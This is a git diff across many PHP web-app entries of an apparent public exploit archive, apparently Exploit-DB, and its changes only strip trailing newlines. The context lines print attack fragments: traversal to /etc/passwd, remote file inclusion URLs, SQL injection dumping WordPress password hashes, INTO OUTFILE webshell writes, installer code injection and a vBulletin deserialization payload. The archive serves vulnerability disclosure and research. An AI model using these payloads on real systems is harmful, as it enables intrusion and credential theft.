Exploit:[Path_JulmaCMS]/file.php?file=../../../../../../etc/passwd # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk -# milw0rm.com [2007-04-25] +# milw0rm.com [2007-04-25] \ No newline at end of file diff --git a/platforms/php/webapps/37998.txt b/platforms/php/webapps/37998.txt index 93a94c337..8a0f155bb 100755 --- a/platforms/php/webapps/37998.txt +++ b/platforms/php/webapps/37998.txt @@ -33,4 +33,4 @@ Shell.php.jpg To Shell.php - + \ No newline at end of file diff --git a/platforms/php/webapps/3800.txt b/platforms/php/webapps/3800.txt index 67454d39d..ace05be4c 100755 --- a/platforms/php/webapps/3800.txt +++ b/platforms/php/webapps/3800.txt @@ -18,4 +18,4 @@ header('Content-Type: text/xml'); # Greetz To: AsbMay's Group & City Of Ghost Team -# milw0rm.com [2007-04-25] +# milw0rm.com [2007-04-25] \ No newline at end of file diff --git a/platforms/php/webapps/38000.txt b/platforms/php/webapps/38000.txt index 6378ec8b2..5c3230fb0 100755 --- a/platforms/php/webapps/38000.txt +++ b/platforms/php/webapps/38000.txt @@ -59,4 +59,4 @@ http://www.wolfcms.org/download.html Suma Soft Pvt. Ltd. | Suma Center | Near Mangeshkar Hospital | Erandawane Pune: 411004 | -*======================================================================* +*======================================================================* \ No newline at end of file diff --git a/platforms/php/webapps/38002.txt b/platforms/php/webapps/38002.txt index cf4e337da..cb8adaa06 100755 --- a/platforms/php/webapps/38002.txt +++ b/platforms/php/webapps/38002.txt @@ -381,4 +381,4 @@ Since there is no protection at all, it is able to trigger many actions via cros aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); - + \ No newline at end of file diff --git a/platforms/php/webapps/38015.txt b/platforms/php/webapps/38015.txt index a59c75ec2..bec456c9e 100755 --- a/platforms/php/webapps/38015.txt +++ b/platforms/php/webapps/38015.txt @@ -19,4 +19,4 @@ method=\"post\"] [input type=\"hidden\" name=\"coment\" value=\'insert uninvited comments 2\' /] [input type=\"submit\" value=\"Submit\"] - + \ No newline at end of file diff --git a/platforms/php/webapps/38017.txt b/platforms/php/webapps/38017.txt index 71afdae24..b824132a4 100755 --- a/platforms/php/webapps/38017.txt +++ b/platforms/php/webapps/38017.txt @@ -4,5 +4,4 @@ The Kakao theme for WordPress is prone to an SQL-injection vulnerability because An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users-- - +http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users-- \ No newline at end of file diff --git a/platforms/php/webapps/3802.txt b/platforms/php/webapps/3802.txt index fad6cffcf..b9ba62f7e 100755 --- a/platforms/php/webapps/3802.txt +++ b/platforms/php/webapps/3802.txt @@ -14,4 +14,4 @@ example; http://www.victim.com/suite/index.php?pg=shell link? -# milw0rm.com [2007-04-26] +# milw0rm.com [2007-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/38027.txt b/platforms/php/webapps/38027.txt index 76a0454b0..bc8feb472 100755 --- a/platforms/php/webapps/38027.txt +++ b/platforms/php/webapps/38027.txt @@ -197,4 +197,4 @@ PoC: - + \ No newline at end of file diff --git a/platforms/php/webapps/3803.txt b/platforms/php/webapps/3803.txt index b5cf587d7..d99f210ba 100755 --- a/platforms/php/webapps/3803.txt +++ b/platforms/php/webapps/3803.txt @@ -36,4 +36,4 @@ http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm -# milw0rm.com [2007-04-26] +# milw0rm.com [2007-04-26] \ No newline at end of file diff --git a/platforms/php/webapps/38030.php b/platforms/php/webapps/38030.php index 9de01e216..2e61f7629 100755 --- a/platforms/php/webapps/38030.php +++ b/platforms/php/webapps/38030.php @@ -35,4 +35,4 @@ http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DU eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");'); die("Triggering CVE-2012-3448 attack.php"); -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38037.html b/platforms/php/webapps/38037.html index c786350e5..4afb9a6da 100755 --- a/platforms/php/webapps/38037.html +++ b/platforms/php/webapps/38037.html @@ -58,4 +58,4 @@ value="yes" /> - + \ No newline at end of file diff --git a/platforms/php/webapps/38044.txt b/platforms/php/webapps/38044.txt index 697ea93f5..0683376b1 100755 --- a/platforms/php/webapps/38044.txt +++ b/platforms/php/webapps/38044.txt @@ -23,4 +23,4 @@ Feng Office 2.2.1 and 2.0 Beta 3 are vulnerable; other versions may also be affe

\ No newline at end of file diff --git a/platforms/php/webapps/3837.txt b/platforms/php/webapps/3837.txt index 24b1f7ad2..fb9c3b12e 100755 --- a/platforms/php/webapps/3837.txt +++ b/platforms/php/webapps/3837.txt @@ -7,4 +7,4 @@ # Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell # Greetz To: Tryag-Team .....## -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/38372.html b/platforms/php/webapps/38372.html index 9dfcc654e..17e5508fe 100755 --- a/platforms/php/webapps/38372.html +++ b/platforms/php/webapps/38372.html @@ -44,5 +44,4 @@ window.frames["csrf2"].document.hack.submit(); } - - + \ No newline at end of file diff --git a/platforms/php/webapps/38377.txt b/platforms/php/webapps/38377.txt index c7955189e..67e39ea5e 100755 --- a/platforms/php/webapps/38377.txt +++ b/platforms/php/webapps/38377.txt @@ -29,4 +29,4 @@ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.example.com/ -Connection: keep-alive +Connection: keep-alive \ No newline at end of file diff --git a/platforms/php/webapps/3838.txt b/platforms/php/webapps/3838.txt index 74295ac7c..9c9778476 100755 --- a/platforms/php/webapps/3838.txt +++ b/platforms/php/webapps/3838.txt @@ -5,4 +5,4 @@ # Exploit:[Path]/skins/header.php?ote_home=Shell # Greetz To: Tryag-Team .....## -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/38385.txt b/platforms/php/webapps/38385.txt index 7ffd31a9d..b2e82b7a9 100755 --- a/platforms/php/webapps/38385.txt +++ b/platforms/php/webapps/38385.txt @@ -48,4 +48,4 @@ uploadbutton.submit(); - + \ No newline at end of file diff --git a/platforms/php/webapps/3839.txt b/platforms/php/webapps/3839.txt index 480f7d689..d8e775471 100755 --- a/platforms/php/webapps/3839.txt +++ b/platforms/php/webapps/3839.txt @@ -21,4 +21,4 @@ Example: http://www.couponscript.com/demo/ ============================================== -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/384.txt b/platforms/php/webapps/384.txt index bb0862ca3..35275231b 100755 --- a/platforms/php/webapps/384.txt +++ b/platforms/php/webapps/384.txt @@ -9,4 +9,4 @@ echo nl2br($blah); ?> -# milw0rm.com [2004-08-08] +# milw0rm.com [2004-08-08] \ No newline at end of file diff --git a/platforms/php/webapps/3840.txt b/platforms/php/webapps/3840.txt index a3696c701..cfdbd0670 100755 --- a/platforms/php/webapps/3840.txt +++ b/platforms/php/webapps/3840.txt @@ -18,4 +18,4 @@ Example: http://preproject.com/phppcl/ ============================================== -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/38406.txt b/platforms/php/webapps/38406.txt index 0c7dc779d..aa95013ab 100755 --- a/platforms/php/webapps/38406.txt +++ b/platforms/php/webapps/38406.txt @@ -83,4 +83,4 @@ warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas -Pentester +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/38407.txt b/platforms/php/webapps/38407.txt index 8d8c33b65..321e18f24 100755 --- a/platforms/php/webapps/38407.txt +++ b/platforms/php/webapps/38407.txt @@ -89,4 +89,4 @@ VII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuseof this -information. +information. \ No newline at end of file diff --git a/platforms/php/webapps/3841.txt b/platforms/php/webapps/3841.txt index 05735db8f..a381f6e67 100755 --- a/platforms/php/webapps/3841.txt +++ b/platforms/php/webapps/3841.txt @@ -21,4 +21,4 @@ Example: http://www.preproject.com/news%20manager/ ============================================== -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/3842.txt b/platforms/php/webapps/3842.txt index fcc00dbe3..691d253a8 100755 --- a/platforms/php/webapps/3842.txt +++ b/platforms/php/webapps/3842.txt @@ -17,4 +17,4 @@ Example: http://preproject.com/emall/ ============================================== -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/3843.txt b/platforms/php/webapps/3843.txt index b7b809599..336f619da 100755 --- a/platforms/php/webapps/3843.txt +++ b/platforms/php/webapps/3843.txt @@ -19,4 +19,4 @@ vendor: http://www.censura.info/ ============================================== -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/php/webapps/38445.txt b/platforms/php/webapps/38445.txt index bae3035e4..473c48ef5 100755 --- a/platforms/php/webapps/38445.txt +++ b/platforms/php/webapps/38445.txt @@ -55,4 +55,4 @@ INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price ################################### # Greets to Palestine from Bosnia # -################################### +################################### \ No newline at end of file diff --git a/platforms/php/webapps/38446.html b/platforms/php/webapps/38446.html index c9459b044..32a551223 100755 --- a/platforms/php/webapps/38446.html +++ b/platforms/php/webapps/38446.html @@ -122,4 +122,4 @@ function exploitrun() - + \ No newline at end of file diff --git a/platforms/php/webapps/38450.txt b/platforms/php/webapps/38450.txt index bbb0ffaf4..de6071d36 100755 --- a/platforms/php/webapps/38450.txt +++ b/platforms/php/webapps/38450.txt @@ -436,9 +436,4 @@ def main(): shutil.rmtree(tmpdir) if __name__ == '__main__': - main() - - - - - + main() \ No newline at end of file diff --git a/platforms/php/webapps/38459.txt b/platforms/php/webapps/38459.txt index f0ffcaca1..a07d5279c 100755 --- a/platforms/php/webapps/38459.txt +++ b/platforms/php/webapps/38459.txt @@ -18,4 +18,4 @@ Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Length: 120 -ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter= +ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter= \ No newline at end of file diff --git a/platforms/php/webapps/3846.txt b/platforms/php/webapps/3846.txt index 2e42ed0e6..26837e8f0 100755 --- a/platforms/php/webapps/3846.txt +++ b/platforms/php/webapps/3846.txt @@ -24,4 +24,4 @@ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/3847.txt b/platforms/php/webapps/3847.txt index 8d9d0723d..7e960f7c2 100755 --- a/platforms/php/webapps/3847.txt +++ b/platforms/php/webapps/3847.txt @@ -31,4 +31,4 @@ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/3848.txt b/platforms/php/webapps/3848.txt index c82c6c185..3576ffe4f 100755 --- a/platforms/php/webapps/3848.txt +++ b/platforms/php/webapps/3848.txt @@ -29,4 +29,4 @@ Site############################################################################ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38482.txt b/platforms/php/webapps/38482.txt index 4a00ce62c..ff6fd3626 100755 --- a/platforms/php/webapps/38482.txt +++ b/platforms/php/webapps/38482.txt @@ -12,6 +12,4 @@ http://www.example.com/path/admin.php?page=[RFI] Path-disclosure: -http://www.example.com/livehelp/xmlhttp.php - - +http://www.example.com/livehelp/xmlhttp.php \ No newline at end of file diff --git a/platforms/php/webapps/38484.rb b/platforms/php/webapps/38484.rb index 4f571fcdb..690dfb5dc 100755 --- a/platforms/php/webapps/38484.rb +++ b/platforms/php/webapps/38484.rb @@ -136,4 +136,4 @@ ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for th 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/3849.txt b/platforms/php/webapps/3849.txt index 2a65f52f5..f1d8599dc 100755 --- a/platforms/php/webapps/3849.txt +++ b/platforms/php/webapps/3849.txt @@ -17,4 +17,4 @@ Google dork: inurl:modules/flashgames/ ================================================================ -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38491.php b/platforms/php/webapps/38491.php index dd42f95e7..baf57df61 100755 --- a/platforms/php/webapps/38491.php +++ b/platforms/php/webapps/38491.php @@ -39,4 +39,4 @@ echo 'PHP code:
'.$page; curl_close($ch); // to close 'logged-in' part -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/38496.txt b/platforms/php/webapps/38496.txt index e40d2ffc4..046e41f94 100755 --- a/platforms/php/webapps/38496.txt +++ b/platforms/php/webapps/38496.txt @@ -180,4 +180,4 @@ POST parameter: text - + \ No newline at end of file diff --git a/platforms/php/webapps/38497.txt b/platforms/php/webapps/38497.txt index 29970e333..42586f524 100755 --- a/platforms/php/webapps/38497.txt +++ b/platforms/php/webapps/38497.txt @@ -101,4 +101,4 @@ SELECT @@version: '5.5.41-MariaDB' [*] shutting down at 14:38:50 -======================================= sqlmap session output. ====================================== +======================================= sqlmap session output. ====================================== \ No newline at end of file diff --git a/platforms/php/webapps/3850.php b/platforms/php/webapps/3850.php index c39ff2b06..898e65db7 100755 --- a/platforms/php/webapps/3850.php +++ b/platforms/php/webapps/3850.php @@ -286,4 +286,4 @@ while (!strstr($admin_user,chr(0))){ } ?> -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38507.txt b/platforms/php/webapps/38507.txt index f4a23fea6..32423df4d 100755 --- a/platforms/php/webapps/38507.txt +++ b/platforms/php/webapps/38507.txt @@ -13,4 +13,4 @@ Request (full-name): testtesttest42949672950Administrators + testtest42949672950Administrators \ No newline at end of file diff --git a/platforms/php/webapps/38511.txt b/platforms/php/webapps/38511.txt index ff279c14e..d87e7c12a 100755 --- a/platforms/php/webapps/38511.txt +++ b/platforms/php/webapps/38511.txt @@ -32,4 +32,4 @@ Malicious code here. ********************************************************************* The uploaded file will then be available on the affected server at: -http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx +http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx \ No newline at end of file diff --git a/platforms/php/webapps/38517.html b/platforms/php/webapps/38517.html index 22c77e39c..c93a64427 100755 --- a/platforms/php/webapps/38517.html +++ b/platforms/php/webapps/38517.html @@ -20,4 +20,4 @@ example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" /> - + \ No newline at end of file diff --git a/platforms/php/webapps/38518.txt b/platforms/php/webapps/38518.txt index 6694a4bcd..94c7c9d7d 100755 --- a/platforms/php/webapps/38518.txt +++ b/platforms/php/webapps/38518.txt @@ -9,4 +9,4 @@ Jojo CMS 1.2 is vulnerable; other versions may also be affected.
-
+ \ No newline at end of file diff --git a/platforms/php/webapps/38519.txt b/platforms/php/webapps/38519.txt index 7703905ae..64273f260 100755 --- a/platforms/php/webapps/38519.txt +++ b/platforms/php/webapps/38519.txt @@ -10,4 +10,4 @@ POST /articles/test/ HTTP/1.1 X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' -- Content-Type: application/x-www-form-urlencoded Content-Length: 88 -name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment +name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment \ No newline at end of file diff --git a/platforms/php/webapps/3852.txt b/platforms/php/webapps/3852.txt index cbccec110..548a3642b 100755 --- a/platforms/php/webapps/3852.txt +++ b/platforms/php/webapps/3852.txt @@ -10,4 +10,4 @@ # And More Download Script ......!!! # Greetz To: Tryag-Team ....## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38520.html b/platforms/php/webapps/38520.html index 243f99a71..31c3df5d4 100755 --- a/platforms/php/webapps/38520.html +++ b/platforms/php/webapps/38520.html @@ -14,5 +14,4 @@ SRF PoC - generated by Burp Suite Professional --> - - + \ No newline at end of file diff --git a/platforms/php/webapps/38524.pl b/platforms/php/webapps/38524.pl index c545ac871..eaaaa33c9 100755 --- a/platforms/php/webapps/38524.pl +++ b/platforms/php/webapps/38524.pl @@ -48,5 +48,4 @@ if($re->is_success) { if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; } else { print "[!] Check your email and confirm u'r post! \n"; } } else { print "[-] HTTP request Failed!\n"; } -exit; - +exit; \ No newline at end of file diff --git a/platforms/php/webapps/3853.txt b/platforms/php/webapps/3853.txt index a8faf1fc4..f4f299bf5 100755 --- a/platforms/php/webapps/3853.txt +++ b/platforms/php/webapps/3853.txt @@ -14,4 +14,4 @@ # Exploit:[Path]/modules/users/headerfile.php?system[path]=shell # Greetz To: Tryag-Team ....## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/3854.txt b/platforms/php/webapps/3854.txt index 8b39beffe..4312f494b 100755 --- a/platforms/php/webapps/3854.txt +++ b/platforms/php/webapps/3854.txt @@ -30,4 +30,4 @@ Site############################################################################ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38543.txt b/platforms/php/webapps/38543.txt index b677b6aa6..e23728fbf 100755 --- a/platforms/php/webapps/38543.txt +++ b/platforms/php/webapps/38543.txt @@ -18,5 +18,4 @@ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 130 -dbhost=localhost&dbport=3306;phpinfo()&dbname=php4dvd&dbuser=root&dbpass=myP@ssw0rd&url=php4dvd&template=default&defaultlanguage=en_US&submit=Next - +dbhost=localhost&dbport=3306;phpinfo()&dbname=php4dvd&dbuser=root&dbpass=myP@ssw0rd&url=php4dvd&template=default&defaultlanguage=en_US&submit=Next \ No newline at end of file diff --git a/platforms/php/webapps/38547.txt b/platforms/php/webapps/38547.txt index ed2e3c5a1..8369e951b 100755 --- a/platforms/php/webapps/38547.txt +++ b/platforms/php/webapps/38547.txt @@ -17,4 +17,4 @@ Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 140 -hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB +hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB \ No newline at end of file diff --git a/platforms/php/webapps/3855.php b/platforms/php/webapps/3855.php index 1ce857036..844b62461 100755 --- a/platforms/php/webapps/3855.php +++ b/platforms/php/webapps/3855.php @@ -189,4 +189,4 @@ function head() { } ?> -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/38565.txt b/platforms/php/webapps/38565.txt index 27cf5902b..af503f079 100755 --- a/platforms/php/webapps/38565.txt +++ b/platforms/php/webapps/38565.txt @@ -69,4 +69,4 @@ Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confir # Greets to Palestine from Bosnia # ################################### -Good Luck ^__^ +Good Luck ^__^ \ No newline at end of file diff --git a/platforms/php/webapps/38567.txt b/platforms/php/webapps/38567.txt index 9d9ee897a..26431d3ad 100755 --- a/platforms/php/webapps/38567.txt +++ b/platforms/php/webapps/38567.txt @@ -41,4 +41,4 @@ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang= -Connection: keep-alive +Connection: keep-alive \ No newline at end of file diff --git a/platforms/php/webapps/3857.txt b/platforms/php/webapps/3857.txt index 6d2632af4..34d800093 100755 --- a/platforms/php/webapps/3857.txt +++ b/platforms/php/webapps/3857.txt @@ -12,4 +12,4 @@ # Miro_Tiger100[at]Hotmail[dot]com -# milw0rm.com [2007-05-05] +# milw0rm.com [2007-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/38572.txt b/platforms/php/webapps/38572.txt index 5e2f02f7f..c00dbf8e6 100755 --- a/platforms/php/webapps/38572.txt +++ b/platforms/php/webapps/38572.txt @@ -164,4 +164,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/38573.txt b/platforms/php/webapps/38573.txt index dccb828e7..1a967b7dd 100755 --- a/platforms/php/webapps/38573.txt +++ b/platforms/php/webapps/38573.txt @@ -437,4 +437,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/3858.php b/platforms/php/webapps/3858.php index 9880880e9..ded9155f8 100755 --- a/platforms/php/webapps/3858.php +++ b/platforms/php/webapps/3858.php @@ -723,4 +723,4 @@ class phpsploit { } ?> -# milw0rm.com [2007-05-05] +# milw0rm.com [2007-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/38585.pl b/platforms/php/webapps/38585.pl index 76ffd6838..707cc9ecb 100755 --- a/platforms/php/webapps/38585.pl +++ b/platforms/php/webapps/38585.pl @@ -26,5 +26,4 @@ if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; -} - +} \ No newline at end of file diff --git a/platforms/php/webapps/38588.php b/platforms/php/webapps/38588.php index 4c74cd9d5..1121f5033 100755 --- a/platforms/php/webapps/38588.php +++ b/platforms/php/webapps/38588.php @@ -134,4 +134,4 @@ while(1) preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/3859.txt b/platforms/php/webapps/3859.txt index 2b54cc875..fe9f09e56 100755 --- a/platforms/php/webapps/3859.txt +++ b/platforms/php/webapps/3859.txt @@ -39,4 +39,4 @@ http://[Target]/[Path]/Admin/ +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-05-05] +# milw0rm.com [2007-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/38592.php b/platforms/php/webapps/38592.php index 06f9fb4f0..dbb7fc471 100755 --- a/platforms/php/webapps/38592.php +++ b/platforms/php/webapps/38592.php @@ -18,4 +18,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co curl_close($ch); print "$postResult"; - ?> + ?> \ No newline at end of file diff --git a/platforms/php/webapps/3860.txt b/platforms/php/webapps/3860.txt index 361235396..9c0049c16 100755 --- a/platforms/php/webapps/3860.txt +++ b/platforms/php/webapps/3860.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail[dot]com -# milw0rm.com [2007-05-05] +# milw0rm.com [2007-05-05] \ No newline at end of file diff --git a/platforms/php/webapps/3861.txt b/platforms/php/webapps/3861.txt index e806dc2be..2972458eb 100755 --- a/platforms/php/webapps/3861.txt +++ b/platforms/php/webapps/3861.txt @@ -28,4 +28,4 @@ Script]] ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-06] +# milw0rm.com [2007-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/3862.txt b/platforms/php/webapps/3862.txt index 48436e84b..7a9457b22 100755 --- a/platforms/php/webapps/3862.txt +++ b/platforms/php/webapps/3862.txt @@ -13,4 +13,4 @@ + ================================================= -# milw0rm.com [2007-05-06] +# milw0rm.com [2007-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/38629.txt b/platforms/php/webapps/38629.txt index c4f1fbaec..b4700a3af 100755 --- a/platforms/php/webapps/38629.txt +++ b/platforms/php/webapps/38629.txt @@ -35,4 +35,4 @@ eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D #Then hit decodeArguments with your payload : -http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D +http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D \ No newline at end of file diff --git a/platforms/php/webapps/3863.txt b/platforms/php/webapps/3863.txt index 34ec566c4..7478bb65c 100755 --- a/platforms/php/webapps/3863.txt +++ b/platforms/php/webapps/3863.txt @@ -5,4 +5,4 @@ # Exploit:[Path]/handlers/page/show.php?sous_rep=Shell # Greetz To: Tryag-Team ....## -# milw0rm.com [2007-05-06] +# milw0rm.com [2007-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/38639.txt b/platforms/php/webapps/38639.txt index 7e1ebd2ca..9ca785c6e 100755 --- a/platforms/php/webapps/38639.txt +++ b/platforms/php/webapps/38639.txt @@ -967,5 +967,4 @@ spiderShop=; darkBG=; keyOfOpenImage=-1; spiderBoxBase="/spiderBox/"; -------------------------[ source code end ]------------------------------------ - +------------------------[ source code end ]------------------------------------ \ No newline at end of file diff --git a/platforms/php/webapps/3864.txt b/platforms/php/webapps/3864.txt index 67532f15b..bd8fa6ab4 100755 --- a/platforms/php/webapps/3864.txt +++ b/platforms/php/webapps/3864.txt @@ -8,4 +8,4 @@ # Exploit:[Path]/_friendly/core/support/_load.php?friendly_path=shell # Greetz To: Tryag-Team ....## -# milw0rm.com [2007-05-06] +# milw0rm.com [2007-05-06] \ No newline at end of file diff --git a/platforms/php/webapps/38649.txt b/platforms/php/webapps/38649.txt index b087bcb52..afa5a9841 100755 --- a/platforms/php/webapps/38649.txt +++ b/platforms/php/webapps/38649.txt @@ -332,4 +332,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/3865.txt b/platforms/php/webapps/3865.txt index 65cd7468e..edcbf2362 100755 --- a/platforms/php/webapps/3865.txt +++ b/platforms/php/webapps/3865.txt @@ -84,4 +84,4 @@ __________§§§§§______§§§§§§____________________ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-07] +# milw0rm.com [2007-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/38651.txt b/platforms/php/webapps/38651.txt index a5f8b5ca0..5db909813 100755 --- a/platforms/php/webapps/38651.txt +++ b/platforms/php/webapps/38651.txt @@ -307,4 +307,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/38652.txt b/platforms/php/webapps/38652.txt index bf4b8c677..0e5be055d 100755 --- a/platforms/php/webapps/38652.txt +++ b/platforms/php/webapps/38652.txt @@ -315,4 +315,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/38654.txt b/platforms/php/webapps/38654.txt index a8053b12b..b6b772129 100755 --- a/platforms/php/webapps/38654.txt +++ b/platforms/php/webapps/38654.txt @@ -30,6 